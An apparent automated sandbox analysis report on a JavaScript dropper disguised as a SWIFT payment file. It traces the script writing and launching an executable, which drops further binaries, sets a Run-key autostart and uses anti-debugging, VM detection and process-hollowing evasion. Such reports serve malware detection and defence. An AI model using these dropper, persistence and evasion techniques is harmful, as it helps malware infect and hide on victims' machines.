      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateObject r:");_Stream.Type("1");_Stream._00000000();ITextStream.WriteLine(" entry:72 o: f:Open");_Stream.Open();_Stream._00000000();ITextStream.WriteLine(" exit:72 o: f:Open r:undefined");IXMLDOMElement.nodeTypedValue();_Stream._00000000();ITextStream.WriteLine(" entry:78 o: f:Write a0:");_Stream.Write("Unsupported parameter type 00002011");_Stream._00000000();ITextStream.WriteLine(" exit:78 o: f:Write r:undefined");IHost.Name();ITextStream.WriteLine(" entry:86 o:Windows%20Script%20Host f:CreateObject a0:%22WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:86 o:Windows%20Script%20Host f:CreateObject r:");IWshShell3._00000000();ITextStream.WriteLine(" entry:93 o: f:ExpandEnvironmentStrings a0:%22%25temp%25%22");IWshShell3.ExpandEnvironmentStrings("%temp%");IWshShell3._00000000();ITextStream.WriteLine(" exit:93 o: f:ExpandEnvironmentStrings r:%22C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5CTemp%22");IWshShell3._00000000();ITextStream.WriteLine(" entry:100 o: f:ExpandEnvironmentStrings a0:%22%25appdata%25%22");IWshShell3.ExpandEnvironmentStrings("%appdata%");IWshShell3._00000000();ITextStream.WriteLine(" exit:100 o: f:ExpandEnvironmentStrings r:%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%22");_Stream._00000000();ITextStream.WriteLine(" entry:138 o: f:SaveToFile a0:%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5CSWIFT%20MO104978172_1301%20EURO%209700.exe%22 a1:2");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe", "2");_Stream._00000000();ITextStream.WriteLine(" exit:138 o: f:SaveToFile r:undefined");ITextStream.WriteLine(" entry:147 o:%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5CSWIFT%20MO104978172_1301%20EURO%209700.exe%22 f:endsWith a0:%22.jar%22");ITextStream.WriteLine(" exec:10 f:");ITextStream.WriteLine(" entry:14 o:C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5CSWIFT%20MO104978172_1301%20EURO%209700.exe f:substr a0:66");ITextStream.WriteLine(" exit:14 o:C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5CSWIFT%20MO104978172_1301%20EURO%209700.exe f:substr r:%22.exe%22");ITextStream.WriteLine(" exit:147 o:%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5CSWIFT%20MO104978172_1301%20EURO%209700.exe%22 f:endsWith r:false");ITextStream.WriteLine(" entry:169 o:%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5CSWIFT%20MO104978172_1301%20EURO%209700.exe%22 f:endsWith a0:%22.vbs%22");ITextStream.WriteLine(" exec:10 f:");ITextStream.WriteLine(" entry:14 o:C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5CSWIFT%20MO104978172_1301%20EURO%209700.exe f:substr a0:66");ITextStream.WriteLine(" exit:14 o:C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5CSWIFT%20MO104978172_1301%20EURO%209700.exe f:substr r:%22.exe%22");ITextStream.WriteLine(" exit:169 o:%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5CSWIFT%20MO104978172_1301%20EURO%209700.exe%22 f:endsWith r:false");ITextStream.WriteLine(" entry:174 o:%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5CSWIFT%
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeUnpacked PE file: 3.2.fdqkbs.exe.4910000.9.unpack
      Source: 3.2.fdqkbs.exe.4910000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 3.2.fdqkbs.exe.4910000.9.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 2_2_004059D5 push ecx; ret 2_2_004059E8
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 3_2_0040084B push edx; ret 3_2_0040085F
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 3_2_0040D2E1 push ecx; ret 3_2_0040D2F4
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 3_2_05077648 push eax; iretd 3_2_05077649
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 2_2_0040B4A5 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,2_2_0040B4A5
      Source: SWIFT MO104978172_1301 EURO 9700.jsString : entropy: 5.98, length: 426786, content: "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAA4fug4AtAnNIbgGo to definition
      Source: 3.2.fdqkbs.exe.4910000.9.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 3.2.fdqkbs.exe.4910000.9.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeFile created: C:\Users\user\AppData\Roaming\tabgrjvojn\syhbwgs.exeJump to dropped file
      Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exeFile created: C:\Users\user\AppData\Local\Temp\fdqkbs.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run aofpiisomveJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run aofpiisomveJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeFile opened: C:\Users\user\AppData\Local\Temp\fdqkbs.exe:Zone.Identifier read attributes | deleteJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_2-8638
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe TID: 4824Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeLast function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_2-7356
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 2_2_00480EBF GetSystemInfo,2_2_00480EBF
      Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exeCode function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405D74
      Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exeCode function: 1_2_0040699E FindFirstFileW,FindClose,1_2_0040699E
      Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exeCode function: 1_2_0040290B FindFirstFileW,1_2_0040290B
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 3_2_00406715 FindFirstFileExW,3_2_00406715
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exeAPI call chain: ExitProcess graph end nodegraph_1-3480
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeAPI call chain: ExitProcess graph end nodegraph_2-7294
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeAPI call chain: ExitProcess graph end nodegraph_3-27791
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeAPI call chain: ExitProcess graph end nodegraph_3-27741
      Source: Amcache.hve.12.drBinary or memory string: VMware
      Source: Amcache.hve.12.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
      Source: Amcache.hve.12.drBinary or memory string: VMware-42 35 34 13 2a 07 0a 9c-ee 7f dd c3 60 c7 b9 af
      Source: Amcache.hve.12.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
      Source: Amcache.hve.12.drBinary or memory string: VMware Virtual USB Mouse
      Source: Amcache.hve.12.drBinary or memory string: VMware, Inc.
      Source: Amcache.hve.12.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
      Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Generation Counter
      Source: Amcache.hve.12.drBinary or memory string: VMware7,1
      Source: Amcache.hve.12.drBinary or memory string: NECVMWar VMware SATA CD00
      Source: Amcache.hve.12.drBinary or memory string: VMware Virtual disk SCSI Disk Device
      Source: Amcache.hve.12.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
      Source: Amcache.hve.12.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
      Source: Amcache.hve.12.drBinary or memory string: VMware, Inc.me
      Source: wscript.exe, 00000000.00000002.261602117.000002C173710000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: Amcache.hve.12.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
      Source: wscript.exe, 00000000.00000002.261602117.000002C173710000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9q
      Source: fdqkbs.exe, 00000003.00000002.279567061.000000000067D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
      Source: Amcache.hve.12.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
      Source: Amcache.hve.12.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 2_2_0040800D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040800D
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 2_2_0040B4A5 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,2_2_0040B4A5
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 2_2_0040E833 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,2_2_0040E833
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 2_2_0048005F mov eax, dword ptr fs:[00000030h]2_2_0048005F
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 2_2_0048017B mov eax, dword ptr fs:[00000030h]2_2_0048017B
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 2_2_00480109 mov eax, dword ptr fs:[00000030h]2_2_00480109
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 2_2_0048013E mov eax, dword ptr fs:[00000030h]2_2_0048013E
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\tabgrjvojn\syhbwgs.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\tabgrjvojn\syhbwgs.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeMemory allocated: page read and write | page guardJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 2_2_0040800D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040800D
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 2_2_0040353D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0040353D
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 2_2_004066DE SetUnhandledExceptionFilter,2_2_004066DE
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 3_2_00401E16 SetUnhandledExceptionFilter,3_2_00401E16
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 3_2_00401C83 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00401C83
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 3_2_004060A4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_004060A4
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 3_2_00401F2A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00401F2A

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\System32\wscript.exeFile created: SWIFT MO104978172_1301 EURO 9700.exe.0.drJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\fdqkbs.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe "C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe" Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess created: C:\Users\user\AppData\Local\Temp\fdqkbs.exe C:\Users\user\AppData\Local\Temp\fdqkbs.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 3_2_0040207B cpuid 3_2_0040207B
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
